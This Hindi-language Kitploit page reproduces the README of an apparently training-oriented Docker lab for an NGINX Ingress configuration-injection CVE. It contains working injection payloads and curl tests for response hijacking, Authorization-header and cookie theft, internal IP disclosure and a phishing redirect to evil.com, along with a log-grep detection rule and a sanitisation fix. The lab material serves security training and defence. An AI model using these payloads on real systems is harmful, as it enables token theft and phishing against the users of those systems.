Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-3288-lab — # CVE-2026-3288 NGINX Ingress कॉन्फ़िगरेशन इंजेक्शन के लिए Docker-आधारित असुरक्षित लैब, जिसमें एक्सप्लॉइट स्क्रिप्ट, डिटेक्शन मॉनिटरिंग, और अधिकृत सुरक्षा प्रशिक्षण के लिए रेमेडिएशन मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/bvabhishek/cve-2026-3288-lab
क्लाउड इन्फ्रास्ट्रक्चर सुरक्षाकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकॉन्फ़िगरेशन ऑडिटिंगपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

# CVE-2026-3288 NGINX Ingress कॉन्फ़िगरेशन इंजेक्शन के लिए Docker-आधारित असुरक्षित लैब, जिसमें एक्सप्लॉइट स्क्रिप्ट, डिटेक्शन मॉनिटरिंग, और अधिकृत सुरक्षा प्रशिक्षण के लिए रेमेडिएशन मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-3288 भेद्यता प्रयोगशाला (Docker)

NGINX Ingress Controller कॉन्फ़िगरेशन इंजेक्शन

⚠️ चेतावनी: इस प्रयोगशाला में जानबूझकर भेद्य कॉन्फ़िगरेशन शामिल हैं, जो केवल अधिकृत सुरक्षा प्रशिक्षण के लिए हैं

भेद्यता अवलोकन

CVE-2026-3288 (CVSS 8.8 उच्च) - NGINX Ingress Controller में कॉन्फ़िगरेशन इंजेक्शन

  • प्रभावित संस्करण: < v1.13.8, v1.14.4, v1.15.0
  • हमला वेक्टर: पथ कॉन्फ़िगरेशन में डबल-कोट (") इंजेक्शन
  • प्रभाव: रिमोट कोड निष्पादन, गोपनीय जानकारी का खुलासा, क्रेडेंशियल चोरी
  • संबंधित: CVE-2026-24512 (समान पथ इंजेक्शन)

मूल कारण

buildProxyPass() फ़ंक्शन nginx कॉन्फ़िगरेशन में इंटरपोलेट करने से पहले पथ इनपुट को सैनिटाइज़ नहीं करता है, जिससे हमलावर कोटेड स्ट्रिंग्स से बाहर निकलकर मनमाने nginx निर्देश इंजेक्ट कर सकते हैं।

प्रयोगशाला घटक

root@kitploit:~
CVE-2026-3288-lab/
├── README.md                          # यह फ़ाइल
├── docker-compose.yml                 # मुख्य प्रयोगशाला सेटअप
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile                # भेद्य NGINX सेटअप
│   │   ├── nginx.conf                # आधार कॉन्फ़िगरेशन
│   │   └── vulnerable-config.conf    # भेद्य पथ हैंडलिंग
│   └── backend/
│       ├── Dockerfile                # सरल बैकएंड ऐप
│       └── app.py                    # Flask एप्लिकेशन
├── exploits/
│   ├── exploit.py                    # स्वचालित शोषण स्क्रिप्ट
│   ├── payloads.txt                  # शोषण पेलोड का संग्रह
│   └── test-exploits.sh              # सभी शोषणों का परीक्षण
├── detection/
│   └── monitor-logs.sh               # शोषण प्रयासों की निगरानी
└── cleanup/
    └── cleanup.sh                    # सभी प्रयोगशाला संसाधन हटाएं

पूर्वापेक्षाएँ

  • Docker स्थापित
  • Docker Compose स्थापित
  • Python 3.6+ (शोषण स्क्रिप्ट के लिए)
  • curl या wget
  • न्यूनतम 2GB RAM

त्वरित प्रारंभ

1. प्रयोगशाला प्रारंभ करें

root@kitploit:~
cd CVE-2026-3288-lab

# भेद्य वातावरण प्रारंभ करें
docker-compose up -d

# स्थिति जांचें
docker-compose ps

2. स्थापना सत्यापित करें

root@kitploit:~
# बैकएंड चल रहा है या नहीं जांचें
curl http://localhost:8080/

# NGINX चल रहा है या नहीं जांचें
curl http://localhost/

3. शोषण चलाएं

root@kitploit:~
cd exploits

# स्वचालित शोषण
python3 exploit.py --all

# या व्यक्तिगत शोषणों का परीक्षण करें
bash test-exploits.sh

4. लॉग की निगरानी करें

root@kitploit:~
# शोषण के लिए NGINX लॉग देखें
docker-compose logs -f nginx

# डिटेक्शन की निगरानी करें
cd detection
bash monitor-logs.sh

5. सफाई

root@kitploit:~
docker-compose down -v

हमले के परिदृश्य

परिदृश्य 1: प्रतिक्रिया अपहरण

हमलावर-नियंत्रित सामग्री परोसने के लिए nginx return निर्देश इंजेक्ट करें।

पेलोड:

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

परीक्षण:

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

परिदृश्य 2: क्रेडेंशियल चोरी

Bearer टोकन चुराने के लिए प्रतिक्रिया में Authorization हेडर वापस प्रतिबिंबित करें।

पेलोड:

root@kitploit:~
/login" return 200 "Token: $http_authorization

परीक्षण:

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

परिदृश्य 3: फ़िशिंग रीडायरेक्ट

उपयोगकर्ताओं को हमलावर-नियंत्रित फ़िशिंग साइट पर रीडायरेक्ट करें।

पेलोड:

root@kitploit:~
/" return 302 "https://evil.com/phishing

परीक्षण:

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

परिदृश्य 4: आंतरिक IP खुलासा

आंतरिक सर्वर जानकारी लीक करें।

पेलोड:

root@kitploit:~
/" return 200 "Internal IP: $server_addr

परीक्षण:

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

परिदृश्य 5: कुकी चोरी

सत्र कुकीज़ चुराएं।

पेलोड:

root@kitploit:~
/" return 200 "Cookies: $http_cookie

परीक्षण:

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

यह कैसे काम करता है

भेद्य कोड पैटर्न

root@kitploit:~
# भेद्य कॉन्फ़िगरेशन
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

शोषण

जब पथ में " होता है, यह कोटेड स्ट्रिंग को तोड़ देता है:

root@kitploit:~
# हमलावर इनपुट: /api" return 200 "HACKED
# परिणाम:
location ~ "^/api" return 200 "HACKED" {
    # मूल कॉन्फ़िगरेशन अब टूट गया है
}

डिटेक्शन

लॉग निगरानी

root@kitploit:~
# संदिग्ध पैटर्न देखें
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

मैनुअल डिटेक्शन

root@kitploit:~
# इंजेक्टेड निर्देशों के लिए NGINX कॉन्फ़िगरेशन जांचें
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

उपचार

तत्काल कार्रवाई

  1. इनपुट सत्यापन - सभी पथ इनपुट को सैनिटाइज़ करें
  2. विशेष वर्णों को एस्केप करें - " और \ को उचित रूप से एस्केप करें
  3. अनुमत सूची का उपयोग करें - केवल ज्ञात-अच्छे पथों की अनुमति दें
  4. लॉग की निगरानी करें - संदिग्ध पैटर्न पर अलर्ट करें

कोड फिक्स

root@kitploit:~
// पहले (भेद्य)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// बाद में (ठीक किया गया)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

सीखने के उद्देश्य

इस प्रयोगशाला को पूरा करने के बाद, आप समझ जाएंगे:

  1. ✅ कॉन्फ़िगरेशन इंजेक्शन भेद्यताएं कैसे काम करती हैं
  2. ✅ अपर्याप्त इनपुट सैनिटाइज़ेशन का प्रभाव
  3. ✅ कई शोषण तकनीकें
  4. ✅ लॉग विश्लेषण के माध्यम से डिटेक्शन विधियां
  5. ✅ उचित उपचार रणनीतियां

समस्या निवारण

कंटेनर प्रारंभ नहीं हो रहे

root@kitploit:~
# लॉग जांचें
docker-compose logs

# पुनः प्रारंभ करें
docker-compose restart

पोर्ट पहले से उपयोग में है

root@kitploit:~
# docker-compose.yml में पोर्ट बदलें
# या विरोधी सेवाओं को रोकें
sudo lsof -i :80

शोषण काम नहीं कर रहे

root@kitploit:~
# सत्यापित करें कि NGINX चल रहा है
docker-compose ps nginx

# NGINX कॉन्फ़िगरेशन जांचें
docker exec cve-2026-3288-nginx nginx -t

सुरक्षा सूचना

  • ⚠️ केवल पृथक प्रयोगशाला वातावरण में उपयोग करें
  • ⚠️ कभी भी उत्पादन प्रणालियों पर तैनात न करें
  • ⚠️ कभी भी इंटरनेट पर उजागर न करें
  • ⚠️ परीक्षण से पहले उचित प्राधिकरण सुनिश्चित करें
  • ⚠️ जिम्मेदार खुलासा प्रथाओं का पालन करें

संदर्भ

  • CVE-2026-3288 सलाह
  • फिक्स PR #14667
  • Sysdig विश्लेषण

केवल अधिकृत सुरक्षा प्रशिक्षण और अनुसंधान उद्देश्यों के लिए बनाया गया

टूल डाउनलोड करें